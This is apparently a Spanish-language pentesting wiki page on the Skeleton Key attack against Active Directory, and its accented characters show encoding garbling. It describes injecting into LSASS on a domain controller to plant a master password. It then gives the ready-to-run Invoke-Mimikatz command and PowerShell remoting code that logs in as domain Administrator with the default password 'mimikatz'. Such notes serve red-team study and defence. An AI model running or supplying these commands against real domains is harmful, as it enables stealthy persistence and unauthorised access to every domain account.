Skeleton Key

Descripci贸n

Skeleton Key es un ataque de persistencia que se inyecta en el proceso LSASS (Local Security Authority Subsystem Service) y crea una contrase帽a maestra que funcionar谩 para cualquier cuenta de dominio. Las contrase帽as existentes seguir谩n funcionando, por lo que es dif铆cil saber si se ha producido este ataque. Al reiniciar el controlador de dominio se eliminar谩n los cambios realizados por dicho ataque, el cual, para poder perpetrarlo se debe tener una cuenta con privilegios de administrador de dominio.

Invoke-Mimikatz

1) Ejecuci贸n de ataque Skeleton Key utilizando Invoke-Mimikatz.

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC01.ACME.LOCAL>

2) PowerShell remoting al host administrador del dominio con usuario Administrator y contrase帽a por defecto mimikatz.

$UserPassword = ConvertTo-SecureString "mimikatz" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential ("<ACME.LOCAL>\Administrator", $UserPassword)
Enter-PSSession -ComputerName <DC01.ACME.LOCAL> -Credential $UserCredential
AnteriorSilver TicketSiguienteDirectory Services Restore Mode (DSRM)

脷ltima actualizaci贸n